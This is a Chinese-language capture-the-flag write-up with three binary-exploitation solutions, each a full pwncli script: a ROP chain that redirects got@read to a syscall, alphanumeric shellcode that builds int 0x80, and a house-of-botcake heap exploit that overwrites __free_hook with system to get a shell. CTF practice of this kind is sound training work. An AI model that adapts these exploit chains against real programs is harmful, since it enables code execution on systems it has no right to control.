目录
随便做了下。
1 r()p
利用如下几个gadgets构造即可:
# 控制rax后任意地址写
.text:000000000040115A mov rsi, rax ; buf
.text:000000000040115D mov edx, dword ptr [rsp+18h+buf] ; nbytes
.text:0000000000401161 xor edi, edi ; fd
.text:0000000000401163 mov eax, 0
.text:0000000000401168 call _read
# 控制rax
0x000000000040116d: mov eax, dword ptr [rsp + 0xc]; add rsp, 0x18; ret;
# 控制 rdi
0x0000000000401099: mov edi, 0x404018; jmp rax;
然后把got@read最低字节修改,指向syscall就能调execve
#!/usr/bin/env python3
# Date: 2022-10-24 16:33:10
# Link: https://github.com/RoderickChan/pwncli
# Usage:
# Debug : python3 exp.py debug elf-file-path -t -b malloc
# Remote: python3 exp.py remote elf-file-path ip:port
# debug in Ubuntu 22.04
from pwncli import *
cli_script()
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
CurrentGadgets.set_find_area(find_in_elf=True, find_in_libc=False, do_initial=False)
# 0x000000000040116d: mov eax, dword ptr [rsp + 0xc]; add rsp, 0x18; ret;
# 0x0000000000401099: mov edi, 0x404018; jmp rax;
s(p32(0x400) + p32(0) + flat({
0x4: 0x404018,
0x10: 0x40115A,
0x24: p32(0x8),
0x30: 0x000000000040116d,
0x44: elf.got.read,
0x50: 0x40115A,
0x64: p32(1), # eax
0x70: 0x000000000040116d,
0x84: p32(elf.bss(0x100)),
0x90: 0x40115A,
0xa4: p32(elf.bss(0x100)),
0xb0: 0x000000000040116d,
0xb0+0x14: p32(CurrentGadgets.ret()),
0xd0: 0x0000000000401099,
0xd8: 0x000000000040116d,
0xd8+0x14: p32(SyscallNumber.amd64.EXECVE),
0xd8+0x20: elf.plt.read
}, length=0x100))
sleep(3)
s("/bin/sh\x00") # write /bin/sh at 0x404018
sleep(3)
if gift.debug:
s("\x90") # write lowest byte of got@read
else: # remote
s("\x0f") # write lowest byte of got@read
sleep(3)
s("\x00") # set rsi rdx
sleep(3)
log_ex("Now Get Shell!")
ia()
2 1!5!
直接看脚本吧。
#!/usr/bin/env python3
# Date: 2022-10-24 15:43:47
# Link: https://github.com/RoderickChan/pwncli
# Usage:
# Debug : python3 exp.py debug elf-file-path -t -b malloc
# Remote: python3 exp.py remote elf-file-path ip:port
from pwncli import *
cli_script()
"""
Stages:
1. rbx is 0, we can control rcx, rdx, rax, firstly invoke system call `read` by `int 0x80` to read again
2. read execve shellcode to getshell
Tips(hex shellcode):
1. 35XXXXXXXX --> xor eax, XXXX
2. \x00\x00 --> add [rax], al (byte), oveflow to get more single byte
3. cd80 --> int 0x80
4. 31414c --> xor [rcx+0x4c], eax (byte)
5. 0x80 = 0x4f + 0x31
6. 0xcd = 5 * 0x4e + 0x47
"""
s(flat({
0: asm("""
push rdx
pop rcx
xor eax, 0x41414141
xor [rcx+0x41], eax
xor eax, 0x41414545 /* eax: 0404*/
xor [rcx+0x43], eax
/*mov eax, 0x1014f*/
push rsi
pop rax
xor eax, 0x42424242
xor eax, 0x42434342
"""),
0x41: "AAAA",
0x45: asm("""
push r9
pop rax
xor eax, 0x42434342
xor eax, 0x42424242
push rax
pop rcx
push r9
pop rax
xor eax, 0x41414141
xor [rcx+0x41], eax
xor [rcx+0x45], eax
xor [rcx+0x49], eax
xor eax, 0x41414545 /* eax: 0404*/
xor [rcx+0x4b], eax
push rdx
pop rcx
push rax
pop rdx
push r9
pop rax
xor eax, 0x41414141
xor eax, 0x41414142
/*push 0x3*/
push rax
/*mov eax, 0x1014e*/
push rsi
pop rax
xor eax, 0x42424242
xor eax, 0x42434343
"""),
0x141: "AAAAAAAAAAAA\x58", # now int 0x80 is ok
0x14e: "\x47", # + 5 * 0x4e; int 0x80 --> \xcd\x80
0x14f: "\x31",
0x1ff: "\x4f"
}, filler="\x59\x51", length=0x200))
log_ex("Now Get Shell!")
s(b"\x90"*0x152 + ShellcodeMall.amd64.execve_bin_sh)
ia()
3 magic_book
5点多开完会还能拿1血......考察基础的house of botcake。
#!/usr/bin/env python3
# Date: 2022-10-23 17:05:38
# Link: https://github.com/RoderickChan/pwncli
# Usage:
# Debug : python3 exp.py debug elf-file-path -t -b malloc
# Remote: python3 exp.py remote elf-file-path ip:port
# bruteforce: for i in $(seq 1 16); do ./exp.py re ./pwn IP:PORT -nl; done
from pwncli import *
cli_script()
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
def cmd(i, prompt="Your choice : "):
sla(prompt, i)
def promise(sz, data="/bin/sh\x00"):
cmd('1')
sla("Size: ", str(sz))
sa("Content: ", data)
def recall(i):
cmd('2')
sla("Index: ", str(i))
def gift_(i):
cmd("9")
sla("Index: ", str(i))
log_ex("Heap fengshui!")
promise(0x100)
promise(0x100) # 1
promise(0x70) # 2
promise(0x100, flat({
0x20: [
0x140, 0x20,
0, 0,
0, 0xc1 # change ub's size
]
})) # 3
for i in range(6): # 3-10
promise(0x100)
for i in range(3, 10):
recall(i)
gift_(1)
recall(0)
promise(0x100)
recall(1)
promise(0x70)
promise(0x80)
log_ex("Bruteforce to leak glibc address!")
if gift.debug:
stdoutaddr = gift._libc_base + libc.sym._IO_2_1_stdout_
stdoutaddr &= 0xffff
else:
stdoutaddr = 0x96a0
leak("stdoutaddr", stdoutaddr)
promise(0x70, p16(stdoutaddr))
promise(0x100, flat("a"*0x70, 0, 0x141)) # change ub size
promise(0x100, flat(0xfbad1887, 0, 0, 0, "\x00"))
lb = recv_current_libc_addr(0x1ec980)
assert (lb >> 40) in (0x7f, 0x7e), "wrong libc base!"
set_current_libc_base_and_log(lb)
recall(0xb)
recall(2)
promise(0xa0, b"a"*0x90 + p64_ex(libc.sym.__free_hook - 8))
promise(0x70)
promise(0x70, p64(0)+p64(libc.sym.system))
recall(0xa)
sleep(0.2)
log_ex("Now Get Shell!")
ia()